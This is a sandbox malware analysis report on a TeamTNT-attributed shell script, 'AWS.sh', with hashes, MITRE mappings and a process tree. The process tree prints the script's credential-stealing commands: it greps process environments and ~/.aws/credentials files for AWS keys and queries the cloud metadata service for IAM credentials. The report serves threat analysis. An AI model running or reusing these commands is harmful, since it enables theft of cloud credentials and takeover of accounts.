317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8

Analysis

max time kernel
149s
max time network
133s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
29-12-2024 23:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
Size

8KB
MD5

572c47986c61bf2fcd7f134299fcd5b2
SHA1

48193cee044078ba308b958cc50a42564c581159
SHA256

af2cf9af17f6db338ba3079b312f182593bad19fab9075a77698f162ce127758
SHA512

97685e6b0fe760342de129905bf05e5a5b6c21cab657b329d6e99c23667c8370ba846c34cd44d543d78f0c793e7641ab94f6761ce439d2c4962e128444ca074c
SSDEEP

96:A40rlQB3tYSQaRqCB4YwSsX9DsGE/D1ElSeU2148WKC2wHyrEGG0benp2GkOQPX1:B6l+425u1/+GK72wHyrEGG0bIp2GiF

Score

6^/10

antivm discovery evasion

Malware Config

Signatures

Enumerates running processes
Discovers information about currently running processes on the system

Reads list of loaded kernel modules 1 TTPs 1 IoCs

Reads the list of currently loaded kernel modules, possibly to detect virtual environments.

evasion

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/modules	AWS.sh

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	AWS.sh

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/462/environ	strings
File opened for reading	/proc/tty	AWS.sh
File opened for reading	/proc/1173/environ	strings
File opened for reading	/proc/keys	AWS.sh
File opened for reading	/proc/1150/environ	strings
File opened for reading	/proc/11/environ	strings
File opened for reading	/proc/1144/environ	strings
File opened for reading	/proc/16/environ	strings
File opened for reading	/proc/171/environ	strings
File opened for reading	/proc/21	AWS.sh
File opened for reading	/proc/kpagecount	AWS.sh
File opened for reading	/proc/12/environ	strings
File opened for reading	/proc/17/environ	strings
File opened for reading	/proc/82/environ	strings
File opened for reading	/proc/34/environ	strings
File opened for reading	/proc/666/environ	strings
File opened for reading	/proc/1166	AWS.sh
File opened for reading	/proc/iomem	AWS.sh
File opened for reading	/proc/1129/environ	strings
File opened for reading	/proc/1175/environ	strings
File opened for reading	/proc/998/environ	strings
File opened for reading	/proc/24/environ	strings
File opened for reading	/proc/473/environ	strings
File opened for reading	/proc/691/environ	strings
File opened for reading	/proc/168	AWS.sh
File opened for reading	/proc/1028/environ	strings
File opened for reading	/proc/158/environ	strings
File opened for reading	/proc/2/environ	strings
File opened for reading	/proc/938	AWS.sh
File opened for reading	/proc/638	AWS.sh
File opened for reading	/proc/27/environ	strings
File opened for reading	/proc/23/environ	strings
File opened for reading	/proc/1507	AWS.sh
File opened for reading	/proc/8/environ	strings
File opened for reading	/proc/1317	AWS.sh
File opened for reading	/proc/81	AWS.sh
File opened for reading	/proc/24	AWS.sh
File opened for reading	/proc/1043/environ	strings
File opened for reading	/proc/638/environ	strings
File opened for reading	/proc/155	AWS.sh
File opened for reading	/proc/89	AWS.sh
File opened for reading	/proc/timer_list	AWS.sh
File opened for reading	/proc/sys	AWS.sh
File opened for reading	/proc/1112/environ	strings
File opened for reading	/proc/1116/environ	strings
File opened for reading	/proc/1139	AWS.sh
File opened for reading	/proc/466	AWS.sh
File opened for reading	/proc/7	AWS.sh
File opened for reading	/proc/934/environ	strings
File opened for reading	/proc/1125/environ	strings
File opened for reading	/proc/1249/environ	strings
File opened for reading	/proc/1104	AWS.sh
File opened for reading	/proc/993	AWS.sh
File opened for reading	/proc/21/environ	strings
File opened for reading	/proc/943/environ	strings
File opened for reading	/proc/196	AWS.sh
File opened for reading	/proc/23	AWS.sh
File opened for reading	/proc/kpageflags	AWS.sh
File opened for reading	/proc/net	AWS.sh
File opened for reading	/proc/18/environ	strings
File opened for reading	/proc/691/environ	strings
File opened for reading	/proc/1268	AWS.sh
File opened for reading	/proc/469	AWS.sh
File opened for reading	/proc/473	AWS.sh

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1509	curl

/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh"
1⤵
- Reads list of loaded kernel modules
- Checks CPU configuration
- Reads runtime system information
PID:1474
- /bin/grep
  grep "AWS_DEFAULT_REGION\\|AWS_ACCESS_KEY_ID\\|AWS_SECRET_ACCESS_KEY\\|AWS_SESSION_TOKEN"
  2⤵
  PID:1478
- /usr/bin/sort
  sort -u
  2⤵
  PID:1477
- /usr/bin/strings
  strings /proc/1/environ /proc/10/environ /proc/1022/environ /proc/1028/environ /proc/1043/environ /proc/1047/environ /proc/1049/environ /proc/1052/environ /proc/1059/environ /proc/1066/environ /proc/1070/environ /proc/1079/environ /proc/1090/environ /proc/11/environ /proc/1100/environ /proc/1104/environ /proc/1108/environ /proc/1112/environ /proc/1116/environ /proc/1120/environ /proc/1125/environ /proc/1129/environ /proc/1130/environ /proc/1133/environ /proc/1136/environ /proc/1139/environ /proc/1144/environ /proc/1145/environ /proc/1148/environ /proc/115/environ /proc/1150/environ /proc/1156/environ /proc/1162/environ /proc/1164/environ /proc/1166/environ /proc/1167/environ /proc/1170/environ /proc/1173/environ /proc/1175/environ /proc/1195/environ /proc/12/environ /proc/1221/environ /proc/1232/environ /proc/1235/environ /proc/1249/environ /proc/1268/environ /proc/1269/environ /proc/1276/environ /proc/1286/environ /proc/1292/environ /proc/13/environ /proc/130/environ /proc/1309/environ /proc/1317/environ /proc/1325/environ /proc/1336/environ /proc/1355/environ /proc/14/environ /proc/1453/environ /proc/1468/environ /proc/1470/environ /proc/1471/environ /proc/1472/environ /proc/1474/environ /proc/1475/environ /proc/1476/environ /proc/1477/environ /proc/1478/environ /proc/15/environ /proc/152/environ /proc/153/environ /proc/154/environ /proc/155/environ /proc/156/environ /proc/157/environ /proc/158/environ /proc/159/environ /proc/16/environ /proc/160/environ /proc/161/environ /proc/162/environ /proc/163/environ /proc/164/environ /proc/165/environ /proc/166/environ /proc/167/environ /proc/168/environ /proc/169/environ /proc/17/environ /proc/171/environ /proc/18/environ /proc/19/environ /proc/196/environ /proc/197/environ /proc/2/environ /proc/20/environ /proc/21/environ /proc/22/environ /proc/23/environ /proc/24/environ /proc/25/environ /proc/253/environ /proc/26/environ /proc/266/environ /proc/27/environ /proc/28/environ /proc/29/environ /proc/3/environ /proc/30/environ /proc/31/environ /proc/32/environ /proc/328/environ /proc/331/environ /proc/34/environ /proc/35/environ /proc/36/environ /proc/4/environ /proc/409/environ /proc/428/environ /proc/429/environ /proc/440/environ /proc/442/environ /proc/448/environ /proc/451/environ /proc/457/environ /proc/458/environ /proc/461/environ /proc/462/environ /proc/466/environ /proc/469/environ /proc/470/environ /proc/473/environ /proc/5/environ /proc/506/environ /proc/507/environ /proc/513/environ /proc/523/environ /proc/544/environ /proc/563/environ /proc/590/environ /proc/592/environ /proc/6/environ /proc/624/environ /proc/638/environ /proc/645/environ /proc/652/environ /proc/662/environ /proc/666/environ /proc/690/environ /proc/691/environ /proc/699/environ /proc/7/environ /proc/78/environ /proc/79/environ /proc/8/environ /proc/80/environ /proc/81/environ /proc/82/environ /proc/83/environ /proc/84/environ /proc/85/environ /proc/857/environ /proc/89/environ /proc/9/environ /proc/923/environ /proc/934/environ /proc/938/environ /proc/943/environ /proc/949/environ /proc/98/environ /proc/993/environ /proc/998/environ /proc/self/environ /proc/thread-self/environ
  2⤵
  - Reads runtime system information
  PID:1476
- /bin/grep
  grep "aws_access_key_id\\|aws_secret_access_key\\|aws_session_token"
  2⤵
  PID:1481
- /bin/cat
  cat /root/.aws/credentials
  2⤵
  PID:1480
- /bin/grep
  grep "aws_access_key_id\\|aws_secret_access_key\\|aws_session_token"
  2⤵
  PID:1484
- /bin/cat
  cat "/home/*/.aws/credentials"
  2⤵
  PID:1483
- /bin/sed
  sed "s/ \"AccessKeyId\" : \"/aws_access_key_id = /g"
  2⤵
  PID:1488
- /bin/sed
  sed "s/\",//g"
  2⤵
  PID:1489
- /bin/grep
  grep AccessKeyId
  2⤵
  PID:1487
- /usr/bin/curl
  curl -sLk http://169.254.169.254/latest/meta-data/iam/security-credentials/
  2⤵
  PID:1491
- /usr/bin/curl
  curl --max-time 13 --connect-timeout 13 -sLk http://169.254.169.254/latest/meta-data/iam/security-credentials/
  2⤵
  PID:1486
- /bin/grep
  grep AWS
  2⤵
  PID:1507
- /usr/bin/sort
  sort -u
  2⤵
  PID:1506
- /usr/bin/strings
  strings /proc/1/environ /proc/10/environ /proc/1022/environ /proc/1028/environ /proc/1043/environ /proc/1047/environ /proc/1049/environ /proc/1052/environ /proc/1059/environ /proc/1066/environ /proc/1070/environ /proc/1079/environ /proc/1090/environ /proc/11/environ /proc/1100/environ /proc/1104/environ /proc/1108/environ /proc/1112/environ /proc/1116/environ /proc/1120/environ /proc/1125/environ /proc/1129/environ /proc/1130/environ /proc/1133/environ /proc/1136/environ /proc/1139/environ /proc/1144/environ /proc/1145/environ /proc/1148/environ /proc/115/environ /proc/1150/environ /proc/1156/environ /proc/1162/environ /proc/1164/environ /proc/1166/environ /proc/1167/environ /proc/1170/environ /proc/1173/environ /proc/1175/environ /proc/1195/environ /proc/12/environ /proc/1221/environ /proc/1232/environ /proc/1235/environ /proc/1249/environ /proc/1268/environ /proc/1269/environ /proc/1276/environ /proc/1286/environ /proc/1292/environ /proc/13/environ /proc/130/environ /proc/1309/environ /proc/1317/environ /proc/1325/environ /proc/1336/environ /proc/1355/environ /proc/14/environ /proc/1453/environ /proc/1468/environ /proc/1470/environ /proc/1471/environ /proc/1472/environ /proc/1474/environ /proc/1492/environ /proc/15/environ /proc/1504/environ /proc/1505/environ /proc/1506/environ /proc/1507/environ /proc/152/environ /proc/153/environ /proc/154/environ /proc/155/environ /proc/156/environ /proc/157/environ /proc/158/environ /proc/159/environ /proc/16/environ /proc/160/environ /proc/161/environ /proc/162/environ /proc/163/environ /proc/164/environ /proc/165/environ /proc/166/environ /proc/167/environ /proc/168/environ /proc/169/environ /proc/17/environ /proc/171/environ /proc/18/environ /proc/19/environ /proc/196/environ /proc/197/environ /proc/2/environ /proc/20/environ /proc/21/environ /proc/22/environ /proc/23/environ /proc/24/environ /proc/25/environ /proc/253/environ /proc/26/environ /proc/266/environ /proc/27/environ /proc/28/environ /proc/29/environ /proc/3/environ /proc/30/environ /proc/31/environ /proc/32/environ /proc/328/environ /proc/331/environ /proc/34/environ /proc/35/environ /proc/36/environ /proc/4/environ /proc/409/environ /proc/428/environ /proc/429/environ /proc/440/environ /proc/442/environ /proc/448/environ /proc/451/environ /proc/457/environ /proc/458/environ /proc/461/environ /proc/462/environ /proc/466/environ /proc/469/environ /proc/470/environ /proc/473/environ /proc/5/environ /proc/506/environ /proc/507/environ /proc/513/environ /proc/523/environ /proc/544/environ /proc/563/environ /proc/590/environ /proc/592/environ /proc/6/environ /proc/624/environ /proc/638/environ /proc/645/environ /proc/652/environ /proc/662/environ /proc/666/environ /proc/690/environ /proc/691/environ /proc/699/environ /proc/7/environ /proc/78/environ /proc/79/environ /proc/8/environ /proc/80/environ /proc/81/environ /proc/82/environ /proc/83/environ /proc/84/environ /proc/85/environ /proc/857/environ /proc/89/environ /proc/9/environ /proc/923/environ /proc/934/environ /proc/938/environ /proc/943/environ /proc/949/environ /proc/98/environ /proc/993/environ /proc/998/environ /proc/self/environ /proc/thread-self/environ
  2⤵
  - Reads runtime system information
  PID:1505
- /bin/rm
  rm -f /var/tmp/TNT_AWS.txt
  2⤵
  PID:1508
- /usr/bin/curl
  curl -sLk ipv4.icanhazip.com
  2⤵
  - System Network Configuration Discovery
  PID:1509

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/tmp/TNT_AWS.txt

Filesize
3B

MD5
2228e977ebea8966e27929f43e39cb67

SHA1
7c338ed2840d2bf55f9f5e4eed04f66c80840eb3

SHA256
6a3cf5192354f71615ac51034b3e97c20eda99643fcaf5bbe6d41ad59bd12167

SHA512
ff9f010b5bdd7591d052fdb8cfc6e7b842f8f973ab37a91ea5e16449c17e9278d9f95f265b0508f083348376aeb16d7f02b7b86cde634e8c9f875287049360de

Download Submit
/var/tmp/TNT_AWS.txt

Filesize
6B

MD5
6d93d3216dc4a7f5df47d4876fbec4d3

SHA1
7a0c7e3dd8173007d955db528117071f441c8541

SHA256
d088784b7ecb87f1ea17e6f982fa968ffefcc07b79de6ecc548fc00242868da6

SHA512
36922722671d2bb1d014b55dccb9431196c0f6e00465a28cea54c25027d08b968e7fdde74df9c287d0c9a7d0ebd195acc572d74d0ac7de0fab6e087b9111029c

Download Submit
/var/tmp/TNT_AWS.txt

Filesize
9B

MD5
33f4f15a16a9843faf6a25d4f387b6fd

SHA1
c0d63dddfbc3523608304cc80ef04e521acb685e

SHA256
1e135afb54bf948ed616b7e518ea9f59c8edad95a2d1dfbae8adc60b167c5f6c

SHA512
faa912fb483361fe90e230c2137c8d6fab26c3accb3199b20140810c533bbbb064fa29da385d57494fb7ff95a4f9dbe4969e552c1f08e95a1e3f9bd87478ab54

Download Submit
/var/tmp/TeamTNT_AWS_STEALER.txt

Filesize
25B

MD5
706262cd6acf8e426902e2131aa76725

SHA1
cb2906e5236dd2720c8517a27c43c19dc79c6a99

SHA256
6b8af17b4b6b1f99fc19b44bd1fe1715290471451dfb701cf5e2fd594d589d9c

SHA512
26edd4bed70d4475d76b59b4572da8fae201fc3e7d54e4a1753aa1e6ab15e22885bc5324cba7ed97a8f5e97bbb3bbc72575ae722381f0e0490475451e6f5fd6c

Download Submit
/var/tmp/TeamTNT_AWS_STEALER.txt

Filesize
50B

MD5
53c4eed3aa0f16c1f34e566e841bb026

SHA1
27fc76586e80661003cdacdea563ced0cf19710f

SHA256
8c32cba969af187b2ab6de8b8c1afcf33f7d36740df6303195c8ae8f807bc147

SHA512
92ecac49852749281bca7803982a0d3b33aebdc16e00662cd5564c10a2f11d8251ca3c3fcf5f2ab33264934489c9cd26734f81e01dd93ed442e4e59b4a5bfe40

Download Submit
/var/tmp/TeamTNT_AWS_STEALER.txt

Filesize
70B

MD5
511befb58daff8bd27aa2507a5048f0e

SHA1
37f4d265a5e9ea6ec6b5d562ea5e46d93e6a6d69

SHA256
5e67c2c5fd5f59c6a56343a80d23fc7ad405d94c2f535a7ed52726e11046141f

SHA512
c83f540583c191552ead7dae449d325166af0448e4a689ae87e57a929a35b5deab6869981ec8afe501266c610340a4bc020e7e9bab995afff9a8aabc982c1a85

Download Submit
/var/tmp/TeamTNT_AWS_STEALER.txt

Filesize
73B

MD5
52348a3bc7381a8237238b44aa62593d

SHA1
92dd9b117dea1e0d1548325143e0a3f408940379

SHA256
67dde48321dbc5d16cddff92ae39b607f7bbafd8ee6d6672ab5a83fd3f76f1e1

SHA512
2e967b0d58ea959343902e1e6041625489796bc5f72758ab660d73e7d9b098f193051c9671c5035ad77cc196a7d13826aac4299bdf5012acc6de7ec136466564

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads